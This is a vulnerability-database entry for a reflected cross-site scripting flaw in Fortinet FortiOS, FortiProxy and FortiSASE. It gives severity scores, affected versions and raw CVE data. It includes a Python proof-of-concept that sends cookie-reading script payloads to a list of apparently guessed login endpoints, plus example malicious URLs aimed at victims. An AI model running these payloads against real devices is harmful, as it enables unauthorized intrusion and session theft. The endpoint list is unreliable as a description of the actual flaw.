Security Vulnerability Report
CVE-2025-31366 CVSS 4.7 MEDIUM

CVE-2025-31366

Published: 2025-10-14 16:15:37
Last Modified: 2026-01-14 10:16:04

Description

An Improper Neutralization of Input During Web Page Generation [CWE-79] vulnerability in Fortinet FortiOS 7.6.0 through 7.6.3, FortiOS 7.4.0 through 7.4.8, FortiOS 7.2 all versions, FortiOS 7.0 all versions, FortiOS 6.4 all versions, FortiProxy 7.6.0 through 7.6.3, FortiProxy 7.4 all versions, FortiProxy 7.2 all versions, FortiProxy 7.0 all versions, FortiSASE 25.2.a may allow an unauthenticated attacker to perform a reflected cross site scripting (XSS) via crafted HTTP requests.

CVSS Details

CVSS Score
4.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* (6.4.0 up to, excluding, 7.4.9) - VULNERABLE
cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* (7.6.0 up to, excluding, 7.6.4) - VULNERABLE
cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:* (7.0.0 up to, excluding, 7.6.4) - VULNERABLE
cpe:2.3:a:fortinet:fortisase:25.3.40:*:*:*:feature:*:*:* - VULNERABLE
cpe:2.3:a:fortinet:fortisase:25.3.40:*:*:*:mature:*:*:* - VULNERABLE
FortiOS 6.4 all versions
FortiOS 7.0 all versions
FortiOS 7.2 all versions
FortiOS 7.4.0 - 7.4.8
FortiOS 7.6.0 - 7.6.3
FortiProxy 7.0 all versions
FortiProxy 7.2 all versions
FortiProxy 7.4 all versions
FortiProxy 7.6.0 - 7.6.3
FortiSASE 25.2.a

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-31366 - Fortinet FortiOS/FortiProxy Reflected XSS PoC
# Vulnerability: Improper Neutralization of Input During Web Page Generation (CWE-79)
# Affected: FortiOS 6.4-7.6.3, FortiProxy 7.0-7.6.3, FortiSASE 25.2.a

import requests
import urllib.parse

TARGET_URL = "https://target-fortinet-device"

# Reflected XSS payload - injected via URL parameter
XSS_PAYLOAD = "<script>alert(document.cookie)</script>"

# Common vulnerable endpoints in Fortinet devices
VULNERABLE_PATHS = [
    "/remote/login",
    "/remote/fgt_lang",
    "/sslvpn_logon.shtml",
    "/login",
    "/remote/logincheck",
]


def craft_xss_url(target, path, param_name, payload):
    """Craft a malicious URL with XSS payload in the parameter"""
    encoded_payload = urllib.parse.quote(payload)
    malicious_url = f"{target}{path}?{param_name}={encoded_payload}"
    return malicious_url


def exploit(target_url, path, param_name="redirect"):
    """Send crafted XSS request to the target"""
    url = craft_xss_url(target_url, path, param_name, XSS_PAYLOAD)
    print(f"[*] Malicious URL: {url}")
    try:
        # Send request - the payload will be reflected in the response
        response = requests.get(url, verify=False, timeout=10)
        print(f"[*] Status Code: {response.status_code}")
        # Check whether the exact payload is reflected unencoded in the response.
        # (Matching on a bare "<script>" tag was dropped: nearly every login page
        # contains one, so that check flagged patched devices as vulnerable.)
        if XSS_PAYLOAD in response.text:
            print("[+] XSS payload reflected in response - VULNERABLE!")
            return True
        else:
            print("[-] Payload not reflected - may be patched")
            return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False


if __name__ == "__main__":
    requests.packages.urllib3.disable_warnings()
    for path in VULNERABLE_PATHS:
        print(f"\n[*] Testing endpoint: {path}")
        exploit(TARGET_URL, path)

# Example malicious URL that could be sent to a victim:
# https://victim-fortigate/remote/login?redirect=javascript:alert(document.cookie)
# https://victim-fortigate/sslvpn_logon.shtml?lang=en%22%3E%3Cscript%3Ealert(1)%3C/script%3E

References

https://fortiguard.fortinet.com/psirt/FG-IR-24-542 (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-31366",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-14T16:15:37.423",
    "lastModified": "2026-01-14T10:16:04.207",
    "vulnStatus": "Modified",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "An Improper Neutralization of Input During Web Page Generation vulnerability [CWE-79] vulnerability in Fortinet FortiOS 7.6.0 through 7.6.3, FortiOS 7.4.0 through 7.4.8, FortiOS 7.2 all versions, FortiOS 7.0 all versions, FortiOS 6.4 all versions, FortiProxy 7.6.0 through 7.6.3, FortiProxy 7.4 all versions, FortiProxy 7.2 all versions, FortiProxy 7.0 all versions, FortiSASE 25.2.a may allow an unauthenticated attacker to perform a reflected cross site scripting (XSS) via crafted HTTP requests."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 4.7,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.6,
          "impactScore": 2.7
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-79"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "6.4.0",
                "versionEndExcluding": "7.4.9",
                "matchCriteriaId": "1B6548FD-E370-45D7-81D5-6EF892810052"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "7.6.0",
                "versionEndExcluding": "7.6.4",
                "matchCriteriaId": "C1C30E0D-7F09-42D2-9EB1-E2196BD50D75"
              }
            ]
          }
        ]
      },
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "7.0.0",
                "versionEndExcluding": "7.6.4",
                "matchCriteriaId": "4DA70753-E996-4081-9C13-7F60AC993B09"
              }
            ]
          }
        ]
      },
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:fortinet:fortisase:25.3.40:*:*:*:feature:*:*:*",
                "matchCriteriaId": "53197A72-5D08-4938-A415-72C573024BF3"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:fortinet:fortisase:25.3.40:*:*:*:mature:*:*:*",
                "matchCriteriaId": "2603C391-AEC6-450A-A30A-4F8682F9565D"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://fortiguard.fortinet.com/psirt/FG-IR-24-542",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}